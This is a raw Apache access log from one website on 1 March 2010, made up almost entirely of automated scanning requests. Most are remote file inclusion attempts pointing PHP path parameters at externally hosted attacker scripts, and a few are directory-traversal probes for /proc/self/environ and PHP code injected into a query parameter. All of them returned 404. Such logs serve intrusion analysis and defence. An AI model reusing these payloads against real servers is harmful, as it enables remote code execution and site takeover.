217.30.180.99 - - [01/Mar/2010:07:03:06 -0800] "GET /logs/access_100213.log/errors.php?error=http://immortal-killaz.servercamp.de/fanatix/cmdstate.txt??? HTTP/1.1" 404 5258 "-" "Mozilla/5.0 (X11; U; Linux i686; en-US; rv:1.9.0.16) Gecko/2009121601 Ubuntu/8.10 (intrepid) Firefox/3.0.16" "www.puaga.com"
217.30.180.99 - - [01/Mar/2010:07:03:06 -0800] "GET /errors.php?error=http://immortal-killaz.servercamp.de/fanatix/cmdstate.txt??? HTTP/1.1" 404 5258 "-" "Mozilla/5.0 (X11; U; Linux i686; en-US; rv:1.9.0.16) Gecko/2009121601 Ubuntu/8.10 (intrepid) Firefox/3.0.16" "www.puaga.com"
217.30.180.99 - - [01/Mar/2010:07:04:36 -0800] "GET /logs/access_100201.log//weather/hw3.php//hw3.php?daysonly=0).include($_GET[file]).(0&file=http://immortal-killaz.servercamp.de/fanatix/cmdstate.txt??? HTTP/1.1" 404 5258 "-" "Mozilla/5.0 (X11; U; Linux i686; en-US; rv:1.9.0.16) Gecko/2009121601 Ubuntu/8.10 (intrepid) Firefox/3.0.16" "www.puaga.com"
217.30.180.99 - - [01/Mar/2010:07:04:36 -0800] "GET /logs/access_100201.log//weather/hw3.php//hw3.php?daysonly=0).include($_GET[file]).(0&file=../../../../../../../../../../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 5258 "-" "Mozilla/5.0 (X11; U; Linux i686; en-US; rv:1.9.0.16) Gecko/2009121601 Ubuntu/8.10 (intrepid) Firefox/3.0.16" "www.puaga.com"
217.30.180.99 - - [01/Mar/2010:07:04:37 -0800] "GET /logs/access_100201.log//weather/hw3.php//hw3.php?daysonly=0).include($_GET[file]).(0&file=../../../../../../../../../../../../../../../../../../../../../../../../proc/self/environ HTTP/1.1" 404 5258 "-" "Mozilla/5.0 (X11; U; Linux i686; en-US; rv:1.9.0.16) Gecko/2009121601 Ubuntu/8.10 (intrepid) Firefox/3.0.16" "www.puaga.com"
217.30.180.99 - - [01/Mar/2010:07:04:37 -0800] "GET /logs/access_100201.log/errors.php?error=http://immortal-killaz.servercamp.de/fanatix/cmdstate.txt??? HTTP/1.1" 404 5258 "-" "Mozilla/5.0 (X11; U; Linux i686; en-US; rv:1.9.0.16) Gecko/2009121601 Ubuntu/8.10 (intrepid) Firefox/3.0.16" "www.puaga.com"
200.93.147.154 - - [01/Mar/2010:07:04:52 -0800] "GET /bbs/write_update.php?board_skin_path=http://zerozon.co.kr/data/eeng/heheh.txt??? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
200.93.147.154 - - [01/Mar/2010:07:04:53 -0800] "GET /logs//bbs/write_update.php?board_skin_path=http://zerozon.co.kr/data/eeng/heheh.txt??? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
200.93.147.154 - - [01/Mar/2010:07:04:56 -0800] "GET /logs/access_100128.log%20%20//bbs/write_update.php?board_skin_path=http://zerozon.co.kr/data/eeng/heheh.txt??? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
122.200.203.11 - - [01/Mar/2010:07:05:09 -0800] "GET /ftpmedia.php?_MG_CONF[path_html]=http://www.samer1.net/space/ray/1.txt? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
122.200.203.11 - - [01/Mar/2010:07:05:09 -0800] "GET /logs/access_100205.log%20%20//ftpmedia.php?_MG_CONF[path_html]=http://www.samer1.net/space/ray/1.txt? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
122.200.203.11 - - [01/Mar/2010:07:05:09 -0800] "GET /logs//ftpmedia.php?_MG_CONF[path_html]=http://www.samer1.net/space/ray/1.txt? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
95.131.66.198 - - [01/Mar/2010:07:05:09 -0800] "GET /logs/access_100202.log//tools/day.php?includedir=http://www.lovebyday.com/zip/Oid1.txt?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
122.200.203.11 - - [01/Mar/2010:07:05:35 -0800] "GET /logs/access_100220.log%20%20//ftpmedia.php?_MG_CONF[path_html]=http://www.samer1.net/space/ray/1.txt? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
95.131.66.198 - - [01/Mar/2010:07:05:54 -0800] "GET /logs/access_100215.log//tools/day.php?includedir=http://www.lovebyday.com/zip/Oid1.txt?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
200.93.147.154 - - [01/Mar/2010:07:05:57 -0800] "GET /logs/access_100214.log%20%20//bbs/write_update.php?board_skin_path=http://zerozon.co.kr/data/eeng/heheh.txt??? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
213.239.206.144 - - [01/Mar/2010:07:06:29 -0800] "GET /informare/informare.php/_skin_path=http://www.samer1.net/space/ray/id1.txt? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
213.239.206.144 - - [01/Mar/2010:07:06:29 -0800] "GET /logs/access_091130.log//informare/informare.php/_skin_path=http://www.samer1.net/space/ray/id1.txt? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
213.239.206.144 - - [01/Mar/2010:07:06:29 -0800] "GET /logs//informare/informare.php/_skin_path=http://www.samer1.net/space/ray/id1.txt? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
218.55.227.145 - - [01/Mar/2010:07:06:29 -0800] "GET /skin_shop/standard/2_view_body/body_default.php?GOODS[no]=deadbeef&GOODS[gs_input]=deadbeef&shop_this_skin_path=http://www.yuiworld.kr/bbs/data/sonota/id1.txt?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
218.55.227.145 - - [01/Mar/2010:07:06:29 -0800] "GET /logs/skin_shop/standard/2_view_body/body_default.php?GOODS[no]=deadbeef&GOODS[gs_input]=deadbeef&shop_this_skin_path=http://www.yuiworld.kr/bbs/data/sonota/id1.txt?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
218.55.227.145 - - [01/Mar/2010:07:06:29 -0800] "GET /logs/access_100218.log%20%20/skin_shop/standard/2_view_body/body_default.php?GOODS[no]=deadbeef&GOODS[gs_input]=deadbeef&shop_this_skin_path=http://www.yuiworld.kr/bbs/data/sonota/id1.txt?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
213.239.206.144 - - [01/Mar/2010:07:06:29 -0800] "GET /logs//informare/informare.php/_skin_path=http://www.samer1.net/space/ray/id1.txt? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
213.239.206.144 - - [01/Mar/2010:07:06:29 -0800] "GET /logs/access_091130.log//informare/informare.php/_skin_path=http://www.samer1.net/space/ray/id1.txt? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
213.239.206.144 - - [01/Mar/2010:07:06:30 -0800] "GET /informare/informare.php/_skin_path=http://www.samer1.net/space/ray/id1.txt? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
213.239.206.144 - - [01/Mar/2010:07:06:34 -0800] "GET /logs/access_091130.log//informare/informare.php/_skin_path=http://www.samer1.net/space/ray/id1.txt? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
213.239.206.144 - - [01/Mar/2010:07:06:34 -0800] "GET /informare/informare.php/_skin_path=http://www.samer1.net/space/ray/id1.txt? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
213.239.206.144 - - [01/Mar/2010:07:06:35 -0800] "GET /logs//informare/informare.php/_skin_path=http://www.samer1.net/space/ray/id1.txt? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
213.239.206.144 - - [01/Mar/2010:07:06:35 -0800] "GET /logs//informare/informare.php/_skin_path=http://www.samer1.net/space/ray/id1.txt? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
213.239.206.144 - - [01/Mar/2010:07:06:35 -0800] "GET /informare/informare.php/_skin_path=http://www.samer1.net/space/ray/id1.txt? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
213.239.206.144 - - [01/Mar/2010:07:06:35 -0800] "GET /logs/access_091130.log//informare/informare.php/_skin_path=http://www.samer1.net/space/ray/id1.txt? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
218.55.227.145 - - [01/Mar/2010:07:07:32 -0800] "GET /logs/access_100129.log%20%20/skin_shop/standard/2_view_body/body_default.php?GOODS[no]=deadbeef&GOODS[gs_input]=deadbeef&shop_this_skin_path=http://www.yuiworld.kr/bbs/data/sonota/id1.txt?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
222.237.78.176 - - [01/Mar/2010:07:07:38 -0800] "GET //components/com_fabrik/libs/Blowfish/CBC.php?mosConfig.absolute.path=http://www.noin9191.com/ams/ammember/fx29id1.txt?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
222.237.78.176 - - [01/Mar/2010:07:07:38 -0800] "GET /logs/access.log///components/com_fabrik/libs/Blowfish/CBC.php?mosConfig.absolute.path=http://www.noin9191.com/ams/ammember/fx29id1.txt?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
222.237.78.176 - - [01/Mar/2010:07:07:38 -0800] "GET /logs///components/com_fabrik/libs/Blowfish/CBC.php?mosConfig.absolute.path=http://www.noin9191.com/ams/ammember/fx29id1.txt?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
122.200.203.11 - - [01/Mar/2010:07:07:51 -0800] "GET /logs//ftpmedia.php?_MG_CONF[path_html]=http://www.samer1.net/space/ray/1.txt? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
122.200.203.11 - - [01/Mar/2010:07:07:51 -0800] "GET /logs/access_100205.log%20%20//ftpmedia.php?_MG_CONF[path_html]=http://www.samer1.net/space/ray/1.txt? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
122.200.203.11 - - [01/Mar/2010:07:07:51 -0800] "GET /ftpmedia.php?_MG_CONF[path_html]=http://www.samer1.net/space/ray/1.txt? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
221.141.1.113 - - [01/Mar/2010:07:07:53 -0800] "GET /logs///admin/classes/TplLoad.php?full_path_to_public_program=http://calcetto5.maxdema.net//components/com_login/id? HTTP/1.1" 404 5258 "-" "libwww-perl/5.805" "www.puaga.com"
122.200.203.11 - - [01/Mar/2010:07:08:11 -0800] "GET /logs/access_100220.log%20%20//ftpmedia.php?_MG_CONF[path_html]=http://www.samer1.net/space/ray/1.txt? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
165.132.30.11 - - [01/Mar/2010:07:08:14 -0800] "GET /logs/access_100205.log%20%20//ftpmedia.php?_MG_CONF[path_html]=http://blog.kakuro.com.tw/include/id1.txt? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
165.132.30.11 - - [01/Mar/2010:07:08:14 -0800] "GET /ftpmedia.php?_MG_CONF[path_html]=http://blog.kakuro.com.tw/include/id1.txt? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
165.132.30.11 - - [01/Mar/2010:07:08:14 -0800] "GET /logs//ftpmedia.php?_MG_CONF[path_html]=http://blog.kakuro.com.tw/include/id1.txt? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
217.73.168.38 - - [01/Mar/2010:07:08:39 -0800] "GET /logs/access_100125.log//errors.php?error=http://ladroz.interfree.it/echos.txt?? HTTP/1.1" 404 5258 "-" "libwww-perl/5.805" "www.puaga.com"
217.73.168.38 - - [01/Mar/2010:07:08:39 -0800] "GET /errors.php?error=http://ladroz.interfree.it/echos.txt?? HTTP/1.1" 404 5258 "-" "libwww-perl/5.805" "www.puaga.com"
217.73.168.38 - - [01/Mar/2010:07:08:39 -0800] "GET /logs//errors.php?error=http://ladroz.interfree.it/echos.txt?? HTTP/1.1" 404 5258 "-" "libwww-perl/5.805" "www.puaga.com"
217.73.168.38 - - [01/Mar/2010:07:08:40 -0800] "GET /logs/access_100214.log//errors.php?error=http://ladroz.interfree.it/echos.txt?? HTTP/1.1" 404 5258 "-" "libwww-perl/5.805" "www.puaga.com"
58.150.99.144 - - [01/Mar/2010:07:08:50 -0800] "GET /logs/access_100202.log%20%20//write_comment_update.php?board_skin_path=http://www.import-et-export.fr//components/com_virtuemart/id1.txt??? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
222.237.78.176 - - [01/Mar/2010:07:09:09 -0800] "GET /logs///components/com_fabrik/libs/Blowfish/CBC.php?mosConfig.absolute.path=http://www.noin9191.com/ams/ammember/fx29id1.txt?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
222.237.78.176 - - [01/Mar/2010:07:09:09 -0800] "GET /logs/access.log%20%20///components/com_fabrik/libs/Blowfish/CBC.php?mosConfig.absolute.path=http://www.noin9191.com/ams/ammember/fx29id1.txt?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
222.237.78.176 - - [01/Mar/2010:07:09:09 -0800] "GET //components/com_fabrik/libs/Blowfish/CBC.php?mosConfig.absolute.path=http://www.noin9191.com/ams/ammember/fx29id1.txt?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
218.55.227.145 - - [01/Mar/2010:07:10:10 -0800] "GET /logs/access_100125.log//install.serverstat.php?mosConfig_absolute_path=http://www.yuiworld.kr/bbs/data/sonota/id1.txt?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
218.55.227.145 - - [01/Mar/2010:07:10:10 -0800] "GET /install.serverstat.php?mosConfig_absolute_path=http://www.yuiworld.kr/bbs/data/sonota/id1.txt?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
218.55.227.145 - - [01/Mar/2010:07:10:10 -0800] "GET /logs//install.serverstat.php?mosConfig_absolute_path=http://www.yuiworld.kr/bbs/data/sonota/id1.txt?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
216.119.103.16 - - [01/Mar/2010:07:10:32 -0800] "GET /logs//components/com_content/content.php?mosConfig.absolute.path=http://region2000.org///images/AinuLid1.txt?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
216.119.103.16 - - [01/Mar/2010:07:10:32 -0800] "GET /components/com_content/content.php?mosConfig.absolute.path=http://region2000.org///images/AinuLid1.txt?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
222.237.78.176 - - [01/Mar/2010:07:10:35 -0800] "GET //components/com_fabrik/libs/Blowfish/CBC.php?mosConfig.absolute.path=http://www.noin9191.com/ams/ammember/fx29id1.txt?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
222.237.78.176 - - [01/Mar/2010:07:10:35 -0800] "GET /logs///components/com_fabrik/libs/Blowfish/CBC.php?mosConfig.absolute.path=http://www.noin9191.com/ams/ammember/fx29id1.txt?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
222.237.78.176 - - [01/Mar/2010:07:10:35 -0800] "GET /logs/access_100211.log%20%20///components/com_fabrik/libs/Blowfish/CBC.php?mosConfig.absolute.path=http://www.noin9191.com/ams/ammember/fx29id1.txt?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
216.119.103.16 - - [01/Mar/2010:07:10:35 -0800] "GET /logs/access_100211.log//components/com_content/content.php?mosConfig.absolute.path=http://region2000.org///images/AinuLid1.txt?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
222.237.78.176 - - [01/Mar/2010:07:10:39 -0800] "GET /logs/components/com_forum/download.php?phpbb_root_path=http://www.noin9191.com/ams/ammember/fx29id1.txt?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
222.237.78.176 - - [01/Mar/2010:07:10:39 -0800] "GET /components/com_forum/download.php?phpbb_root_path=http://www.noin9191.com/ams/ammember/fx29id1.txt?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
222.237.78.176 - - [01/Mar/2010:07:10:39 -0800] "GET /logs/access_100201.log/components/com_forum/download.php?phpbb_root_path=http://www.noin9191.com/ams/ammember/fx29id1.txt?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
222.237.78.176 - - [01/Mar/2010:07:10:40 -0800] "GET /logs/access.log%20%20///components/com_fabrik/libs/Blowfish/CBC.php?mosConfig.absolute.path=http://www.noin9191.com/ams/ammember/fx29id1.txt?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
216.119.103.16 - - [01/Mar/2010:07:11:05 -0800] "GET /components/com_content/content.php?mosConfig.absolute.path=http://region2000.org///images/AinuLid1.txt?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
216.119.103.16 - - [01/Mar/2010:07:11:05 -0800] "GET /logs//components/com_content/content.php?mosConfig.absolute.path=http://region2000.org///images/AinuLid1.txt?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
216.119.103.16 - - [01/Mar/2010:07:11:05 -0800] "GET /logs/access_100123.log%20%20//components/com_content/content.php?mosConfig.absolute.path=http://region2000.org///images/AinuLid1.txt?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
222.237.78.176 - - [01/Mar/2010:07:11:05 -0800] "GET //components/com_fabrik/libs/Blowfish/CBC.php?mosConfig.absolute.path=http://www.noin9191.com/ams/ammember/fx29id1.txt?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
222.237.78.176 - - [01/Mar/2010:07:11:05 -0800] "GET /logs///components/com_fabrik/libs/Blowfish/CBC.php?mosConfig.absolute.path=http://www.noin9191.com/ams/ammember/fx29id1.txt?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
222.237.78.176 - - [01/Mar/2010:07:11:05 -0800] "GET /logs/access.log///components/com_fabrik/libs/Blowfish/CBC.php?mosConfig.absolute.path=http://www.noin9191.com/ams/ammember/fx29id1.txt?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
60.251.165.181 - - [01/Mar/2010:07:11:16 -0800] "GET /logs/access_100202.log/http://keycarsales.com/css/templates/target.txt? HTTP/1.1" 404 5258 "-" "libwww-perl/5.805" "www.puaga.com"
216.119.103.16 - - [01/Mar/2010:07:11:23 -0800] "GET /logs//components/com_content/content.php?mosConfig.absolute.path=http://region2000.org///images/AinuLid1.txt?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
216.119.103.16 - - [01/Mar/2010:07:11:23 -0800] "GET /components/com_content/content.php?mosConfig.absolute.path=http://region2000.org///images/AinuLid1.txt?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
216.119.103.16 - - [01/Mar/2010:07:11:23 -0800] "GET /logs/access_100123.log//components/com_content/content.php?mosConfig.absolute.path=http://region2000.org///images/AinuLid1.txt?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
66.249.65.246 - - [01/Mar/2010:07:12:05 -0800] "GET /robots.txt HTTP/1.1" 200 36 "-" "Googlebot-Image/1.0" "puaga.com"
66.249.65.246 - - [01/Mar/2010:07:12:06 -0800] "GET /akifbar/images/Header.gif HTTP/1.1" 200 2985 "-" "Googlebot-Image/1.0" "puaga.com"
122.200.203.11 - - [01/Mar/2010:07:12:56 -0800] "GET /newspublish/include.php?path%5Bdocroot%5D=http://www.samer1.net/space/ray/1.txt? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
122.200.203.11 - - [01/Mar/2010:07:12:56 -0800] "GET /logs//newspublish/include.php?path%5Bdocroot%5D=http://www.samer1.net/space/ray/1.txt? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
122.200.203.11 - - [01/Mar/2010:07:12:56 -0800] "GET /logs/access_100123.log%20%20//newspublish/include.php?path%5Bdocroot%5D=http://www.samer1.net/space/ray/1.txt? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
122.200.203.11 - - [01/Mar/2010:07:13:02 -0800] "GET /logs//newspublish/include.php?path%5Bdocroot%5D=http://www.samer1.net/space/ray/1.txt? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
122.200.203.11 - - [01/Mar/2010:07:13:02 -0800] "GET /newspublish/include.php?path%5Bdocroot%5D=http://www.samer1.net/space/ray/1.txt? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
122.200.203.11 - - [01/Mar/2010:07:13:02 -0800] "GET /logs/access_100123.log%20%20//newspublish/include.php?path%5Bdocroot%5D=http://www.samer1.net/space/ray/1.txt? HTTP/1.0" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
222.237.78.176 - - [01/Mar/2010:07:13:24 -0800] "GET /logs/access_100217.log%20%20///components/com_fabrik/libs/Blowfish/CBC.php?mosConfig.absolute.path=http://www.noin9191.com/ams/ammember/fx29id1.txt?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
64.15.152.132 - - [01/Mar/2010:07:14:05 -0800] "GET /newspublish/include.php?path%5Bdocroot%5D=http://www.samer1.net/space/ray/1.txt? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
64.15.152.132 - - [01/Mar/2010:07:14:05 -0800] "GET /logs//newspublish/include.php?path%5Bdocroot%5D=http://www.samer1.net/space/ray/1.txt? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
64.15.152.132 - - [01/Mar/2010:07:14:06 -0800] "GET /logs/access_100123.log%20%20//newspublish/include.php?path%5Bdocroot%5D=http://www.samer1.net/space/ray/1.txt? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
64.15.152.132 - - [01/Mar/2010:07:14:09 -0800] "GET /newspublish/include.php?path%5Bdocroot%5D=http://www.samer1.net/space/ray/1.txt? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
64.15.152.132 - - [01/Mar/2010:07:14:09 -0800] "GET /logs/access_100123.log%20%20//newspublish/include.php?path%5Bdocroot%5D=http://www.samer1.net/space/ray/1.txt? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
64.15.152.132 - - [01/Mar/2010:07:14:09 -0800] "GET /logs//newspublish/include.php?path%5Bdocroot%5D=http://www.samer1.net/space/ray/1.txt? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
77.225.42.178 - - [01/Mar/2010:07:14:15 -0800] "GET /logs/access_100202.log//tools/day.php?includedir=http://www.lovebyday.com/zip/Oid1.txt?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
174.37.143.198 - - [01/Mar/2010:07:14:53 -0800] "GET /include/write.php?dir=http://www.boomong.com/bbs//data/1.txt??? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
174.37.143.198 - - [01/Mar/2010:07:14:53 -0800] "GET /logs/access_100205.log%20%20//include/write.php?dir=http://www.boomong.com/bbs//data/1.txt??? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
174.37.143.198 - - [01/Mar/2010:07:14:53 -0800] "GET /logs//include/write.php?dir=http://www.boomong.com/bbs//data/1.txt??? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
174.37.143.198 - - [01/Mar/2010:07:14:53 -0800] "GET /logs/access_100207.log%20%20//include/write.php?dir=http://www.boomong.com/bbs//data/1.txt??? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
174.37.143.198 - - [01/Mar/2010:07:14:53 -0800] "GET /include/write.php?dir=http://www.boomong.com/bbs//data/1.txt??? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
174.37.143.198 - - [01/Mar/2010:07:14:53 -0800] "GET /logs/access_100205.log%20%20//include/write.php?dir=http://www.boomong.com/bbs//data/1.txt??? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
174.37.143.198 - - [01/Mar/2010:07:14:53 -0800] "GET /logs//include/write.php?dir=http://www.boomong.com/bbs//data/1.txt??? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
174.37.143.198 - - [01/Mar/2010:07:14:53 -0800] "GET /logs/access_100207.log%20%20//include/write.php?dir=http://www.boomong.com/bbs//data/1.txt??? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
123.143.29.250 - - [01/Mar/2010:07:15:43 -0800] "GET /install.serverstat.php?mosConfig_absolute_path=http://www.yuiworld.kr/bbs/data/sonota/id1.txt?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
123.143.29.250 - - [01/Mar/2010:07:15:43 -0800] "GET /logs//install.serverstat.php?mosConfig_absolute_path=http://www.yuiworld.kr/bbs/data/sonota/id1.txt?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
123.143.29.250 - - [01/Mar/2010:07:15:44 -0800] "GET /logs/access_100125.log//install.serverstat.php?mosConfig_absolute_path=http://www.yuiworld.kr/bbs/data/sonota/id1.txt?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
61.111.3.35 - - [01/Mar/2010:07:16:25 -0800] "GET /logs//install.serverstat.php?mosConfig_absolute_path=http://www.yuiworld.kr/bbs/data/sonota/id1.txt?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
61.111.3.35 - - [01/Mar/2010:07:16:25 -0800] "GET /logs/access_100125.log//install.serverstat.php?mosConfig_absolute_path=http://www.yuiworld.kr/bbs/data/sonota/id1.txt?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
61.111.3.35 - - [01/Mar/2010:07:16:25 -0800] "GET /install.serverstat.php?mosConfig_absolute_path=http://www.yuiworld.kr/bbs/data/sonota/id1.txt?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
218.55.227.145 - - [01/Mar/2010:07:16:57 -0800] "GET /logs/access_100218.log/skin_shop/standard/2_view_body/body_default.php?GOODS[no]=deadbeef&GOODS[gs_input]=deadbeef&shop_this_skin_path=http://www.yuiworld.kr/bbs/data/sonota/id1.txt?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
218.55.227.145 - - [01/Mar/2010:07:17:14 -0800] "GET /logs/access_100220.log%20%20//install.serverstat.php?mosConfig_absolute_path=http://www.yuiworld.kr/bbs/data/sonota/id1.txt?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
218.55.227.145 - - [01/Mar/2010:07:17:15 -0800] "GET /logs/access_100221.log/skin_shop/standard/2_view_body/body_default.php?GOODS[no]=deadbeef&GOODS[gs_input]=deadbeef&shop_this_skin_path=http://www.yuiworld.kr/bbs/data/sonota/id1.txt?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
77.225.42.178 - - [01/Mar/2010:07:18:07 -0800] "GET /logs/access_100215.log//tools/day.php?includedir=http://www.lovebyday.com/zip/Oid1.txt?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
204.202.2.23 - - [01/Mar/2010:07:18:21 -0800] "GET /logs//newspublish/include.php?path%5Bdocroot%5D=http://www.anabolex.com/list-old/admin/temp/head?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
204.202.2.23 - - [01/Mar/2010:07:18:21 -0800] "GET /newspublish/include.php?path%5Bdocroot%5D=http://www.anabolex.com/list-old/admin/temp/head?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
204.202.2.23 - - [01/Mar/2010:07:18:21 -0800] "GET /logs/access_100123.log%20%20//newspublish/include.php?path%5Bdocroot%5D=http://www.anabolex.com/list-old/admin/temp/head?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
123.143.29.250 - - [01/Mar/2010:07:18:37 -0800] "GET /logs/access_100125.log%20%20//install.serverstat.php?mosConfig_absolute_path=http://www.yuiworld.kr/bbs/data/sonota/id1.txt?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
165.132.30.11 - - [01/Mar/2010:07:19:23 -0800] "GET /logs/access_100123.log%20%20//newspublish/include.php?path%5Bdocroot%5D=http://blog.kakuro.com.tw/include/id1.txt? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
165.132.30.11 - - [01/Mar/2010:07:19:23 -0800] "GET /logs//newspublish/include.php?path%5Bdocroot%5D=http://blog.kakuro.com.tw/include/id1.txt? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
165.132.30.11 - - [01/Mar/2010:07:19:23 -0800] "GET /newspublish/include.php?path%5Bdocroot%5D=http://blog.kakuro.com.tw/include/id1.txt? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
123.143.29.250 - - [01/Mar/2010:07:19:40 -0800] "GET /logs/access_100204.log%20%20//install.serverstat.php?mosConfig_absolute_path=http://www.yuiworld.kr/bbs/data/sonota/id1.txt?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
